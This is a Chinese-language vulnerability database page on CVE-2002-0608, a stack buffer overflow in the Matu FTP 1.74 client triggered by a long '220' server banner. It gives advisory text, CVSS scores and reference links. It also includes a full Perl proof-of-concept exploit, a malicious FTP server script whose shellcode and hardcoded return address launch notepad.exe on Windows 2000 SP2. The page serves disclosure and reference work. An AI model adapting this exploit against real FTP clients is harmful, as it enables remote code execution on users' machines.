CVE-2002-0608
CVSS7.5
发布时间 :2002-06-18 00:00:00
修订时间 :2008-09-05 16:28:28
NMCOES    

[原文]Buffer overflow in Matu FTP client 1.74 allows remote FTP servers to execute arbitrary code via a long "220" banner.


[CNNVD]Matu FTP客户端远程缓冲区溢出漏洞(CNNVD-200206-022)

        
        Matu FTP是一款日文FTP客户端,可使用在WIN32系统平台下。
        Matu FTP存在缓冲溢出,可导致恶意FTP服务器在Matu ftp客户端系统上执行任意命令。
        攻击者可以在FTP服务器端,向Matu ftp客户端系统提交超长的'220'响应,可使客户端FTP程序产生缓冲区溢出,精心构建响应数据可导致以matu ftp进程的权限在目标系统上执行任意代码。
        发送随机数据可导致应用程序崩溃产生拒绝服务攻击。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0608
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0608
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200206-022
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/4572
(VENDOR_ADVISORY)  BID  4572
http://www.iss.net/security_center/static/8911.php
(VENDOR_ADVISORY)  XF  matu-ftp-long-string-bo(8911)
http://archives.neohapsis.com/archives/bugtraq/2002-04/0310.html
(VENDOR_ADVISORY)  BUGTRAQ  20020422 Matu FTP remote buffer overflow vulnerability

- 漏洞信息

Matu FTP客户端远程缓冲区溢出漏洞
高危 边界条件错误
2002-06-18 00:00:00 2005-10-20 00:00:00
远程  
        
        Matu FTP是一款日文FTP客户端,可使用在WIN32系统平台下。
        Matu FTP存在缓冲溢出,可导致恶意FTP服务器在Matu ftp客户端系统上执行任意命令。
        攻击者可以在FTP服务器端,向Matu ftp客户端系统提交超长的'220'响应,可使客户端FTP程序产生缓冲区溢出,精心构建响应数据可导致以matu ftp进程的权限在目标系统上执行任意代码。
        发送随机数据可导致应用程序崩溃产生拒绝服务攻击。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 暂时没有合适的临时解决方法。
        厂商补丁:
        Matu
        ----
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://plaza20.mbn.or.jp/~matuhome/

- 漏洞信息 (21410)

Matu FTP 1.74 Client Buffer Overflow Vulnerability (EDBID:21410)
windows remote
2002-04-23 Verified
0 Kanatoko
N/A [点击下载]
source: http://www.securityfocus.com/bid/4572/info

An issue has been reported which could allow for a malicious ftp server to execute arbitrary code on a Matu FTP client. 

If,upon user connection, a FTP server '220' response is of excessive length, a stack-based overflow condition could occur. This overflow could overwrite stack variables and be used to execute arbitrary code. However, sending random data could cause the application to crash.


pwd
#!/usr/local/bin/perl

#------------------------------------------------------------------------
# Matu Ftp Version 1.74 exploit for Windows2000 Professional (SP2)
# ( run under inetd )
# written by Kanatoko <anvil@jumperz.net>
# http://www.jumperz.net/
#------------------------------------------------------------------------
$|=1;

        #egg written by UNYUN (http://www.shadowpenguin.org/)
$egg  = "\xEB\x27\x8B\x34\x24\x33\xC9\x33\xD2\xB2";
$egg .= "\x0B\x03\xF2\x88\x0E\x2B\xF2\xB8\xAF\xA7";
$egg .= "\xE6\x77\xB1\x05\xB2\x04\x2B\xE2\x89\x0C";
$egg .= "\x24\x2B\xE2\x89\x34\x24\xFF\xD0\x90\xEB";
$egg .= "\xFD\xE8\xD4\xFF\xFF\xFF";
$egg .= "notepad.exe";

        #egg_address = 0x0012F43C
$buf = "\x90" x 217;
$buf .= $egg;
$buf .= "A" x 2;
$buf .= "\x3C\xF4\x12\x00";
$buf .= "B" x 80;

print "220 $buf\r\n";		

- 漏洞信息

14429
Matu FTP Client 220 Banner Processing Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

A remote overflow exists in the Matu FTP client. The Matu FTP client fails to properly check the bounds of certain responses returned by the server, resulting in a buffer overflow. With a specially crafted 220 reply code, a malicious server can cause a buffer overflow resulting in a loss of integrity.

- 时间线

2002-04-22 Unknow
Unknow Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

- 漏洞信息

Matu FTP Client Buffer Overflow Vulnerability
Boundary Condition Error 4572
Yes No
2002-04-23 12:00:00 2009-07-11 12:46:00
Discovered by Kanatoko <anvil@jumperz.net>.

- 受影响的程序版本

Matu Matu FTP 1.74

- 漏洞讨论

An issue has been reported which could allow for a malicious ftp server to execute arbitrary code on a Matu FTP client.

If,upon user connection, a FTP server '220' response is of excessive length, a stack-based overflow condition could occur. This overflow could overwrite stack variables and be used to execute arbitrary code. However, sending random data could cause the application to crash.

- 漏洞利用

Kanatoko &lt;anvil@jumperz.net&gt; has provided the following exploit:

- 解决方案

Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站